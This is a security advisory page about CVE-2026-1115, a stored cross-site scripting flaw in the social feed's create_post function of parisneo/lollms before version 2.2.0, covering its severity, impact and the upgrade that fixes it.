What is CVE-2026-1115?

A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` fu...

How severe is CVE-2026-1115?

CVE-2026-1115 is rated critical severity with a CVSS score of 9.6 out of 10.

What products are affected by CVE-2026-1115?

CVE-2026-1115 affects Lollms Lollms. Check vendor advisories for specific affected versions.

How do I fix CVE-2026-1115?

Apply the latest security patches from the vendor. If patching is not immediately possible, review the mitigation steps in this advisory and monitor for exploitation attempts.

CVE-2026-1115: parisneo/lollms Stored XSS

Patch now - CVE-2026-1115 is a critical stored cross-site scripting (XSS) vulnerability in parisneo/lollms versions prior to 2.2.0 that lets an unprivileged attacker hijack any viewing user’s browser session, including administrators, by posting a malicious social feed entry.

Overview

A critical stored Cross-Site Scripting (XSS) vulnerability, CVE-2026-1115, was identified in the parisneo/lollms application. The flaw resides in the platform’s social feature, specifically within the create_post function. This function failed to sanitize user input before storing it in the database, allowing malicious JavaScript code to be permanently embedded.

Technical Details

The vulnerability is located in backend/routers/social/__init__.py. When a user creates a post, the content is directly assigned to the DBPost model without any validation or sanitization. This stored payload is then rendered and executed in the browsers of any user who views the compromised post in the Home Feed. The attack requires no special privileges, and the victim only needs to view the malicious content, making exploitation straightforward.

Impact and Risks

With a CVSS score of 9.6, this vulnerability poses a severe risk. An attacker can craft a post containing malicious JavaScript. When other users, including administrators, view this post, the script executes in their browser session. This can lead directly to:

Account takeover through session hijacking.
Unauthorized actions performed on behalf of the victim.
Wormable attacks where the malicious post spreads automatically. Given the social nature of the feature, a single compromised post could rapidly affect numerous users on the platform. For more on how such exploits can lead to data exposure, see our breach reports.

Remediation

The issue is fully resolved in version 2.2.0 of parisneo/lollms. The only complete mitigation is to upgrade all affected instances to this version immediately. There is no effective workaround; disabling the social feature would be required to block the attack vector, which may not be practical for all deployments.

Security Insight

This vulnerability highlights the persistent risk of XSS in modern web applications, especially in user-generated content features that are often rushed to market. It mirrors a common pattern seen in other platforms where input sanitization is an afterthought rather than a core design principle. The high severity underscores that even non-RCE flaws in interactive components can be critically damaging, enabling lateral movement and privilege escalation within an application. Stay updated on similar threats by following our security news.

CVE-2026-1115: parisneo/lollms Stored XSS

Overview

Technical Details

Impact and Risks

Remediation

Security Insight

Further Reading

Never miss a critical vulnerability

Related Advisories

Other Lollms Lollms Vulnerabilities

Overview

Technical Details

Impact and Risks

Remediation

Security Insight

Further Reading

Never miss a critical vulnerability

Related Advisories

Other Lollms Lollms Vulnerabilities

Never Miss a Critical Alert